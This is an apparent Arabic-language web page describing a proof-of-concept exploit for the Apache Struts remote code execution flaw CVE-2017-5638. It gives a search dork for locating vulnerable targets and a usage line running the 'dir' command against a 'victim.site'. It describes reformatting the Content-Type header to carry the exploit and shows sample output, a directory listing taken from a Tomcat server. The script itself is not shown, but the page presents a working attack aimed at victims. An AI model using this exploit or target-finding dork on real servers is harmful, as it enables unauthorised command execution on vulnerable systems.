
مثال على كود PoC لـ CVE-2017-5638 | استغلال Apache Struts
مثال لكود PoC لـ CVE-2017-5638 | استغلال Apache Struts | DORK: ext:action
الاستخدام: python struts.py https://victim.site dir
النص البرمجي الأولي بلغة بايثون الذي تم نشره لم يقم بتنسيق رأس Content-Type بشكل صحيح. أعدت كتابة رأس Content-Type لتنسيقه بشكل صحيح: Content-Type:%20{Exploit}. كما أضفت تسجيل (logging) ومكتبة Requests، ثم قمت بطباعة خصائص الكائن (Object Properties) إلى stdout.
عينة من الإخراج
التحقق من CVE-2017-5638 بواسطة XSS.Cx
لا يوجد تسمية لوحدة التخزين في القرص D. الرقم التسلسلي لوحدة التخزين هو 2A7B-A245 دليل d:\Program Files\Apache Software Foundation\Tomcat 9.0